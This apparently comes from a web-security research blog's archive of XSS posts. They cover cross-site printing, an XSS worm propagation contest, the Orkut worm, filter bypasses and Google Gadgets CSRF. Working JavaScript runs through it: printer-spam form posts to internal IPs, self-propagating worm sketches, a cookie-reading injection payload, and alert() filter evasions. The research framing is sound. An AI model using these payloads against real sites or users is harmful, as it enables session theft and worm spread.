Archive for the 'XSS' Category

Aaron Weaver has taken the concept of inter-protocol XSS hacking to the next annoying level. That’s right, folks: he has figured out that you can do cross-site printing. That is, when you visit a malicious website, it can attempt to connect to the printer on your local network and send data to it. The obvious use? You got it: spam!

So now, when you visit sites, there is the potential for them to spam you, much the way some people receive fax spam. While he has only gone so far as to show how you can send ASCII art, it would be interesting to see whether a PostScript-formatted file could be sent in a way that the printer would understand and print. For the time being, however, we are limited to low-def ASCII-art spam.

There are, however, some fairly sophisticated programs that analyze photos and generate ASCII art from them. What will be nastier is when this turns into actual exploits against the printers themselves, as many printers retain copies of printed materials for weeks or years afterwards. Also, depending on what the spammers put on your printer, the content of the print job could even get people fired (no pun intended). Very interesting research by Aaron Weaver!
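For the curious, the inter-protocol trick boils down to a form POST aimed at the printer’s raw port. Here’s a minimal sketch of the idea, assuming a printer listening on the standard JetDirect port 9100 at a guessed internal address - the helper and its payload format are illustrative, not Aaron’s actual code:

```javascript
// Build a plain-text "print job": normalize line endings and append a
// form feed (\f) so the printer ejects the page when the data ends.
function buildPrintJob(message) {
  return message.split("\n").join("\r\n") + "\f";
}

// In a browser, POST the job straight at the printer's raw port. With
// enctype text/plain the field name lands in the request body almost
// verbatim, and the printer prints whatever bytes arrive on port 9100.
function spamPrinter(printerIp, message) {
  var form = document.createElement("form");
  form.method = "POST";
  form.action = "http://" + printerIp + ":9100/"; // e.g. a guessed 192.168.x.x
  form.enctype = "text/plain";
  var field = document.createElement("textarea");
  field.name = buildPrintJob(message); // payload rides in the field name
  form.appendChild(field);
  document.body.appendChild(form);
  form.submit();
}
```

Note that the printer also receives the HTTP headers as part of the stream, which is why the ASCII art comes out framed by a few lines of junk.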

Well, so far this week has probably been one of the most interesting I’ve had running this site in a long time, and not only from a technical perspective: the ethical debate over whether I am sheer evil or contributing to the greater good reared its ugly head once again, this time in regards to the diminutive XSS worm contest. One of my favorites was being compared to arming people with nuclear weapons. Clearly (and admittedly) most of these people have no background in the issue and have never read this site or the rest of sla.ckers, as there are plenty of samples of existing worm code in lots of places on the Internet now. Just because they don’t know about it doesn’t mean it’s not there.

The existing samples of worm code are always plagued by three things that make them difficult to work with and that I don’t care about: obfuscation for filter evasion, which we’ve already researched to death; payloads, which we have also researched heavily; and site-specific code, which really is uninteresting to me unless I were trying to help that particular company solve an existing problem. So the goal is to strip those things away and focus on the actual XSS propagation, on which little research has been done to date.

I’ve always said you don’t understand a problem until you see it and play with it. That’s why experience is always more valuable than schooling in a topic; it’s like getting into a fist fight with a professional boxer having never sparred before and expecting to win. If working to further the understanding of worm propagation makes me evil, so be it. I’d rather be evil and able to help solve problems than be good and useless at solving them (as most of the nay-sayers are, I’ve found). That’s why people like Giorgio Maone (the author of the NoScript plugin) chipped in to help with the contest. People like him are solving the problem in their own ways as well. It’s in everyone’s best interest to understand all the vectors. Will this empower bad guys? I’d be naive to say there’s no chance of that. However, the goal here is to understand why the propagation methods were chosen so we can build defenses against them. We have already had tons of interesting findings that will help us narrow down the most dangerous strains and start making suggestions to browser companies and to security companies developing defensive technologies, so that they can build tools to prevent this.

For people who liken me to an anti-virus company writing viruses, I’d like to point out that I don’t get paid to consult with browser companies on browser security (at least I haven’t in the several years I’ve been doing this). In the spirit of full disclosure, I have been paid to help out with other things, but not browser security. That’s right, I give advice in the browser security arena for free (for which I have actually been chastised by other executives who feel I’m wasting my time since I’m not making any money on it). I do it because I’m actually interested in solving the problem. To date I have also never been paid by any company that has been hit by an XSS worm. I have, however, on several occasions given them intel and advice, pro bono. Also, unlike an anti-virus company, I don’t have a security product in development. So yes, tin-foil-hat wearers can rest easy - this actually is academic. I know, crazy talk! That’s why this is a web app security lab. People visit this site (or should, at least) with the knowledge that we are pushing the boundaries of what’s known about web application security. We aren’t talking about yesterday’s problems. Think the bad guys are going to stop their own research if we stop talking about it? In this profit-driven malicious ecosystem, there’s no chance of that anymore. At least in an open format we can come up with solutions and see the results of each other’s work.

Another interesting point of view, from Kurt Wismer, was that by soliciting diminutive code I will always get obfuscated code as output (which I have said a number of times I was trying to avoid) because of the coding tricks necessary to make it that small. He’s absolutely right, of course, but that’s a red herring. See, there are two types of obfuscation, which may be beyond the grasp of people who don’t actually work in this field. The first type is obfuscation to create short, lean code. The second is obfuscation for filter evasion (MD5ing something, hex-encoding something, making something polymorphic, writing “ev”+”al” instead of “eval” to beat some regex or string matching, etc…). I’m sorry I didn’t clarify - that’s probably non-obvious to people who don’t understand webappsec. So unfortunately, for the most part that’s not an interesting comment, although there are some tidbits in some of the code variants that do cause problems I will need to disregard for the sake of the research, which I’ll talk about after the contest is over.

Anyway, over the last few days I’ve been called a moron, an idiot, and probably a half dozen other things. But through it all, I’m 100% confident that this will lead to previously unpublished and poorly understood results about worm propagation (confident because it has already yielded various interesting problems that we have had to clarify with rules I didn’t even think would come up). And I’m also confident that this will lead to ways in which we can protect ourselves from these worms - not today, certainly, but over time, as we as a community start building tools to prevent these issues based, in part, on the results of this contest. I wouldn’t expect everyone reading this to “get it,” as most people don’t really understand how the security world works. I would, however, hope that everyone sits tight and holds their dramatic postings for the results, or at least asks me what I think instead of jumping to wild conclusions. Christmas is already over, though, and I already got my wishes granted, so I won’t be surprised if that doesn’t happen.

So that’s the drama! Gotta love it, huh? Where would I be without the under-educated rants and conspiracy theories? The good news is that there is a lot of really interesting research coming out of the contest, and submissions are approaching the 150-170 byte range. We’re already seeing trends emerge around the most size-efficient ways to write the code, and the ways the code must work for the best propagation and portability. The two methods of actual spread that appear to be building toward a consensus among the submissions are XMLHttpRequest and submit events. We’ll see how things turn out, but I’m quickly getting the feeling these are by far the two most likely candidates for worm propagation. My question is: what valid reasons can people come up with for why the browser should automatically submit a form without user interaction? More detailed analysis to come once we get closer to the cutoff. Amazing stuff!
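To make the two finalists concrete, here is a heavily hedged sketch of each style. Every endpoint and field name below is invented, and the payload and site-specific parts are deliberately left out, per the contest rules:

```javascript
// Shared helper: url-encode the worm source into a POST body.
function buildPostBody(field, payload) {
  return field + "=" + encodeURIComponent(payload);
}

// Style 1: XMLHttpRequest. Same-origin, silent, and the victim's session
// cookie is attached automatically. ("/profile/update" and "about_me"
// are hypothetical.)
function propagateViaXHR(payload) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/profile/update", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(buildPostBody("about_me", payload));
}

// Style 2: an auto-submitted form. No XHR object required, and form.submit()
// fires without any user interaction - which is exactly the behavior the
// question above is asking about.
function propagateViaForm(payload) {
  var form = document.createElement("form");
  form.method = "POST";
  form.action = "/profile/update"; // hypothetical
  var input = document.createElement("input");
  input.name = "about_me";
  input.value = payload;
  form.appendChild(input);
  document.body.appendChild(form);
  form.submit();
}
```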

Pandora’s box is already open, folks, and for good or bad Samy was the culprit, not me. Time to start working on solutions, rather than trying to keep the research quiet.

The diminutive XSS worm replication contest is a week-long contest to collect good samples of the smallest amount of code necessary for XSS worm propagation. I’m not interested in payloads for this contest, but rather in the propagation methods themselves. We’ve seen live worm code, and all of it is muddied by obfuscation, individual site issues, and the payload itself. I’d rather think cleanly about the most efficient method of propagation, where every character matters.

digi7al64 has already posted a sample piece of code, setting the baseline. His code is an impressively small 292 characters. There’s no prize here; however, I will definitely be talking about the winner’s code. The winner will be announced on the 10th, after all submissions are in and posted. Visit the thread for more details. This should be interesting for anyone looking at worm propagation issues!
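None of this describes digi7al64’s actual entry (that’s in the thread), but one generic size-saving trick worth knowing is self-reference: if the worm can read its own markup back out of the DOM, the propagation code never has to carry a quoted, escaped copy of itself. A hedged sketch, with the element id invented:

```javascript
// Give the injected element a short id, then read the worm back out of the
// page instead of embedding a second, escaped copy of the source. In situ
// this would be something like document.getElementById('w').outerHTML.
function wormSource(el) {
  return el.outerHTML;
}
```

In a real entry that string would be handed straight to whichever propagation method wins out, with no quoting or escaping gymnastics needed.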

In the wake of the disclosure of the Flash vulnerabilities found on thousands of websites, I felt I should probably post something about it. I have read the relevant section of the upcoming book by Rich Cannings and Himanshu Dwivedi and, as promised to the person who sent it to me, won’t disclose it until I hear otherwise (if ever - it’s a book, and you can just buy it). Today I got an email and a call from Adobe with details they wanted to present to people who may be concerned about it:

Adobe is developing a solution in an update to Flash Player that will prevent these attacks on existing vulnerable SWFs.

Adobe is also applying these guidelines to SWF templates that are commonly deployed, which will be available as updates in early January, and we are working with other software vendors to update their templates.

Together, these strategies provide a complete solution to the potential vulnerabilities.

So if you have Flash on your site, it is highly recommended that you take these precautionary steps to protect yourself. It’s nice to see Adobe taking this seriously and moving so quickly. I certainly wasn’t expecting a phone call - way to go, guys!

John Smith sent me this link to a writeup on how customers hosted at 1&1 Internet are vulnerable to XSS. The technique is simple, but it stems from the way they present ads upon detecting a file-not-found condition. They pop up an iframe based on the requested file name, which you can jump out of pretty easily. Not so good. I’m not sure what sort of customers 1&1 Internet serves, but I’d be unhappy if I were one. Apparently this only applies to Sedo parking prior to a certain date, and also doesn’t apply to users with custom 404 pages (which I generally prefer to use, personally).

This brings up an interesting point, though, about the use of third-party advertising and how it can be used for wide-scale XSS exploitation. In this case it’s no different, except that instead of requiring DOM-based XSS like it normally would, the server does the reflection for you. Odd problem. I’ve run into similar problems with hosting providers that put log files for all their customers in the same predictable location; finding the customers is the only hard part - getting their logs is easy! Nice find!
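The underlying bug pattern is worth spelling out. This is a hedged reconstruction, not 1&1’s actual code - the handler and parameter names are invented - but the shape (the requested filename reflected into markup unescaped) is the whole vulnerability:

```javascript
// Vulnerable 404 handler (sketch): the missing filename is concatenated
// into the ad iframe without HTML-escaping.
function build404Page(requestedFile) {
  return '<iframe src="/ads?file=' + requestedFile + '"></iframe>';
}

// A crafted "filename" closes the attribute and the iframe, then injects
// script - jumping out of the frame exactly as described above.
var attack = build404Page('"></iframe><script>alert(document.cookie)<\/script>');

// The fix is the boring one: entity-encode before reflecting.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}
```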

However, Thrill then posted a screenshot of this on one of the several domain registrars we found to be vulnerable. So now we have proof that this can be done. Of course, the usefulness is probably limited to only a few sites, but they are sites that often take credit card information for domain payment processing - which, obviously, has some usefulness for phishing. Anyway, pretty interesting stuff!

Several people sent this to me over the last few days, but for those of you who hadn’t seen it in the myriad of places it showed up: Orkut was hit by an XSS worm. Orkut is Google’s version of social networking. It was big for a while, but I think everyone bailed in favor of the more open MySpaces and Facebooks of the world. It’s still widely used by the Portuguese-speaking population, though.

Rough estimates are north of 300,000 people compromised, even though it was caught relatively quickly. It’s amazing how fast these things grow in environments like that, where the medium for spreading is a technology that almost everyone uses and that works across platforms. I think the only things that kept this one from being more virulent were that it wasn’t fully cross-platform and that the social engineering could have been a little more seamless.

Here are the POST requests sent in by Lavakumar:

The POST request sent by the worm to add the victim to the “Infectados pelo Vírus do Orkut” community. The community id is “44001818”.

And the code can be found in many places around the net, but I also threw a copy up on the sla.ckers.org XSS worm section for anyone looking for example worm code. I’m trying to keep that section up to date with non-theoretical, practical, real-world worm code so we can all see it. Google has fixed this issue, but it is unclear what the fallout from the damage will be.
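The capture itself belongs to Lavakumar, so rather than reproduce it, here’s a heavily hedged sketch of the shape of such a request. Every endpoint and parameter name below is invented for illustration; only the community id comes from the writeup above. The point is simply that an XHR fired from the victim’s own session carries their cookies, so “join this community” becomes one silent POST:

```javascript
// Build the urlencoded body for a hypothetical "join community" action.
function buildJoinBody(communityId) {
  return "action=join&community=" + encodeURIComponent(communityId);
}

// Fire it from the victim's session (browser only; the endpoint is made up).
function joinCommunity(communityId) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/CommunityJoin", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(buildJoinBody(communityId)); // session cookies attach automatically
}
```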

I’m always amazed at people who think that blocking alert() is an effective way to block cross-site scripting. I’ve seen it myself, and it’s one of those things that never sounded right, even the first time I saw it years ago. It sounds even less right now; here’s an email from a friend of mine, Jon McClintock:

I just got a nice XSS “win” that I thought I’d share with you. The app had an odd filter that would block JS calls to the alert() method.

So this (invalid JS) input got in:

";alert"xss";

But this didn’t:

";alert("xss");

The usual whitespace and comment tricks didn’t work either, and other useful methods, such as eval, were also blocked. So what do you do? Function pointer, of course:

";var foo=alert;foo("xss");

That’s a great example - pointing at functions - but what about things like confirm() or prompt()? Sure, maybe those are all blocked too, but come on… it’s time to start addressing the problem, rather than trying to block one of the hundreds of ways someone can initiate the attack. Anyway, great example!
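To underline the point, here are a few of those hundreds of ways, assuming (as in the app above) that only the literal strings “alert(” and “eval” are filtered. None of these contains either token:

```javascript
// Browser-only demo; the filtered tokens never appear in the source.
function bypasses() {
  var f = window.alert;                  // the function-pointer trick above
  f("xss");
  window["al" + "ert"]("xss");           // property lookup with an assembled name
  confirm("xss");                        // sibling dialog functions
  prompt("xss");
  setTimeout("confi" + "rm('xss')", 0);  // string-to-code without the eval token
}

// The assembled name exists only at runtime, so string matching misses it.
var assembled = "al" + "ert";
```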

I know we’ve all thought about it, but for some reason this one hits a little harder than others - partially, I think, because we all like to believe we are unique and every hack needs to be forensically important. Think about it: if you were running the Miami Dolphins and saw this happen to your site, you’d want answers, and you’d want them now. And then, after spending countless hours and tons of resources, you’d find that the answer is that you were just one hack out of 25,000. The Dolphins had an interesting website, but it was actually insignificant in the grand scheme of the attack.

It’s an interesting thought that one attack compromised 25,000 websites, which in turn could have compromised hundreds of thousands or even millions of remote machines via the ANI payload delivered through XSS. And ultimately, the attackers are still at large. It’s a pretty scary concept when you consider the low diversity among open source web applications, which makes them much more susceptible to attack. Maybe that tiny webapp hole isn’t so tiny after all.

To further illuminate the problems with Google Gadgets that Tom Stripling spoke about at the OWASP conference, I asked him to write up the details so we could all take a look. I think this is a fairly thorough writeup. Obviously there is more work to be done here, but ultimately I think it proves the point:

First of all, here is the Google documentation on inlining, if you’re interested:

My original goal was to CSRF a module onto someone’s page, then run another CSRF attack that inlined it, and then go to town. Google has thwarted my early efforts, but I’m not convinced that it isn’t possible.

Google has a parameter called “_et” that is set to a random value and required on every change to the iGoogle page. Without this value, you can’t submit a valid request to load a module, so it prevents basic CSRF.

It turns out that the parameter also shows up on the gmodules.com domain for certain “approved” gadgets. So I was going to steal this parameter with AJAX and use it to force a module onto someone’s page.

The initial attack would involve someone following a link to the page you identified that allows XSS on gmodules.com. A link like this:

This gadget (which is never meant to actually end up on someone’s page) loads an AJAX request to get the page for another (approved) gadget, steals the _et param and tries to submit a request to google.com that loads the gadget.

It doesn’t work. I had to cut off my testing in the middle because I realized I probably needed to create slides if I was going to present this stuff, but I did notice that the _et param I was stealing was different from the one on my iGoogle home page, so it may be that Google has thought of this and is preventing it by using different _et values for different domains. It may also be that I have a bug in my JavaScript somewhere. I will look into this more as soon as I have time (but I have no idea when that will be).

So right now, I still can’t cross over from gmodules.com to google.com without user interaction. Still, the user interaction is pretty weak. They provide a preview page that will load a module with one click:

And then another click to inline the module. By the way, don’t load that on your real Google account - it actually does send your cookies offsite. Feel free to download, play with, or publish any of these gadgets. Here’s another one that just does a basic phishing attack: